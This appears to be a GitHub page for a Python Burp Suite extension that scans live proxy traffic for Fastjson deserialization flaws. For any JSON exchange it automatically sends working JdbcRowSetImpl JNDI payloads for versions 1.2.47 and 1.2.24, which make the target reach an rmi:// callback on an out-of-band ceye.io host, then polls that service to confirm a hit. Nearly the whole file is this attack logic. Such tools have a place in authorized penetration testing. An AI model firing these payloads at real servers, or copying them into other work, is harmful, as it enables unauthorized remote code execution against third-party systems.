-
Notifications
You must be signed in to change notification settings - Fork 20
/
Copy pathfastjson.py
181 lines (159 loc) · 9.12 KB
/
fastjson.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
# /usr/bin/env python
# _*_ coding:utf-8 _*_
__author__ = '瓦都剋'
from burp import IBurpExtender
from burp import IHttpListener
from burp import IHttpRequestResponse
from burp import IResponseInfo
from burp import IRequestInfo
from burp import IHttpService
import sys
import time
import os
import re
import requests
from hashlib import md5
import random
def randmd5():
new_md5 = md5()
new_md5.update(str(random.randint(1, 1000)))
return new_md5.hexdigest()[:6]
class BurpExtender(IBurpExtender, IHttpListener):
def registerExtenderCallbacks(self, callbacks):
print("[+] #####################################")
print("[+] Fastjson Scan")
print("[+] Author: 瓦都剋")
print("[+] Email: admin@w2n1ck.com")
print("[+] Blog: https://www.w2n1ck.com")
print("[+] #####################################\r\n\r\n")
self._callbacks = callbacks
self._helpers = callbacks.getHelpers()
callbacks.setExtensionName('Fastjson Scan')
callbacks.registerHttpListener(self)
def processHttpMessage(self, toolFlag, messageIsRequest, messageInfo):
global response_is_json
# if toolFlag == self._callbacks.TOOL_PROXY or toolFlag == self._callbacks.TOOL_REPEATER:
if toolFlag == self._callbacks.TOOL_PROXY or toolFlag == self._callbacks.TOOL_REPEATER:
# 监听Response
if not messageIsRequest:
'''请求数据'''
# 获取请求包的数据
resquest = messageInfo.getRequest()
analyzedRequest = self._helpers.analyzeRequest(resquest)
request_header = analyzedRequest.getHeaders()
request_bodys = resquest[analyzedRequest.getBodyOffset():].tostring()
request_host, request_Path = self.get_request_host(request_header)
request_contentType = analyzedRequest.getContentType()
#print "request_contentType:"+str(request_contentType)
'''响应数据'''
# 获取响应包数据
response = messageInfo.getResponse()
analyzedResponse = self._helpers.analyzeResponse(response) # returns IResponseInfo
response_headers = analyzedResponse.getHeaders()
response_bodys = response[analyzedResponse.getBodyOffset():].tostring()
response_statusCode = analyzedResponse.getStatusCode()
expression = r'.*(application/json).*'
for rpheader in response_headers:
if rpheader.startswith("Content-Type:") and re.match(expression, rpheader):
response_is_json = True
# 获取服务信息
httpService = messageInfo.getHttpService()
port = httpService.getPort()
host = httpService.getHost()
# 请求类型或响应类型是application/json
if response_is_json or request_contentType == 4:
randomStr = randmd5() + "-1.2.47-"
newBodyPayload = '{"a":{"@type":"java.lang.Class","val":"com.sun.rowset.JdbcRowSetImpl"},"b":{"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"rmi://'+ str(randomStr) + '.xxxxx.ceye.io/Exploit","autoCommit":true}}'
# newBodyPayload = payload.format(str(randomStr), str(host), str(port))
# 将字符串转换为字节 https://portswigger.net/burp/extender/api/burp/IExtensionHelpers.html#stringToBytes(java.lang.String)
newBody = self._helpers.stringToBytes(newBodyPayload)
# 重构json格式的数据不能用buildParameter,要用buildHttpMessage替换整个body重构http消息。https://portswigger.net/burp/extender/api/burp/IExtensionHelpers.html#buildHttpMessage(java.util.List,%20byte[])
newRequest = self._helpers.buildHttpMessage(request_header, newBody)
ishttps = False
expression = r'.*(443).*'
if re.match(expression, str(port)):
ishttps = True
rep = self._callbacks.makeHttpRequest(host, port, ishttps, newRequest)
r = requests.get("http://api.ceye.io/v1/records?token=xxxx&type=dns&filter=" + str(randomStr))
#print r.content
if ((randomStr in r.content) and (r.status_code == 200)):
messageInfo.setHighlight('red')
print "[+] Target vulnerability"
print "\t[-] host:" + str(host)
print "\t[-] port:" + str(port)
print "\t[-] fastjson version:1.2.47"
print "\t[-] playload:" + str(newBodyPayload) + "\r\n"
if response_is_json or request_contentType == 4:
randomStr = randmd5() + "-1.2.24-"
newBodyPayload = '{"b":{"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"rmi://'+ str(randomStr) + '.xxxxx.ceye.io/Exploit","autoCommit":true}}'
# newBodyPayload = payload.format(str(randomStr), str(host), str(port))
# 将字符串转换为字节 https://portswigger.net/burp/extender/api/burp/IExtensionHelpers.html#stringToBytes(java.lang.String)
newBody = self._helpers.stringToBytes(newBodyPayload)
# 重构json格式的数据不能用buildParameter,要用buildHttpMessage替换整个body重构http消息。https://portswigger.net/burp/extender/api/burp/IExtensionHelpers.html#buildHttpMessage(java.util.List,%20byte[])
newRequest = self._helpers.buildHttpMessage(request_header, newBody)
ishttps = False
expression = r'.*(443).*'
if re.match(expression, str(port)):
ishttps = True
rep = self._callbacks.makeHttpRequest(host, port, ishttps, newRequest)
r = requests.get("http://api.ceye.io/v1/records?token=xxxx&type=dns&filter=" + str(randomStr))
#print r.content
if ((randomStr in r.content) and (r.status_code == 200)):
messageInfo.setHighlight('yellow')
print "[+] Target vulnerability"
print "\t[-] host:" + str(host)
print "\t[-] port:" + str(port)
print "\t[-] fastjson version:1.2.24"
print "\t[-] playload:" + str(newBodyPayload) + "\r\n"
# 获取请求的url
def get_request_host(self, reqHeaders):
uri = reqHeaders[0].split(' ')[1]
host = reqHeaders[1].split(' ')[1]
return host, uri
# 获取请求的一些信息:请求头,请求内容,请求方法,请求参数
def get_request_info(self, request):
analyzedIRequestInfo = self._helpers.analyzeRequest(request)
reqHeaders = analyzedIRequestInfo.getHeaders()
reqBodys = request[analyzedIRequestInfo.getBodyOffset():].tostring()
reqMethod = analyzedIRequestInfo.getMethod()
reqParameters = analyzedIRequestInfo.getParameters()
reqHost, reqPath = self.get_request_host(reqHeaders)
reqContentType = analyzedIRequestInfo.getContentType()
print(reqHost, reqPath)
return analyzedIRequestInfo, reqHeaders, reqBodys, reqMethod, reqParameters, reqHost, reqContentType
# 获取响应的一些信息:响应头,响应内容,响应状态码
def get_response_info(self, response):
analyzedIResponseInfo = self._helpers.analyzeRequest(response)
resHeaders = analyzedIResponseInfo.getHeaders()
resBodys = response[analyzedIResponseInfo.getBodyOffset():].tostring()
# getStatusCode获取响应中包含的HTTP状态代码。返回:响应中包含的HTTP状态代码。
# resStatusCode = analyzedIResponseInfo.getStatusCode()
return resHeaders, resBodys
# 获取服务端的信息,主机地址,端口,协议
def get_server_info(self, httpService):
host = httpService.getHost()
port = httpService.getPort()
protocol = httpService.getProtocol()
return host, port, protocol
# 获取请求的参数名、参数值、参数类型(get、post、cookie->用来构造参数时使用)
def get_parameter_Name_Value_Type(self, parameter):
parameterName = parameter.getName()
parameterValue = parameter.getValue()
parameterType = parameter.getType()
return parameterName, parameterValue, parameterType
def doActiveScan(self, baseRequestResponse, insertionPoint):
pass
def doPassiveScan(self, baseRequestResponse):
self.issues = []
self.start_run(baseRequestResponse)
return self.issues
def consolidateDuplicateIssues(self, existingIssue, newIssue):
'''
相同的数据包,只报告一份报告
:param existingIssue:
:param newIssue:
:return:
'''
if existingIssue.getIssueDetail() == newIssue.getIssueDetail():
return -1
return 0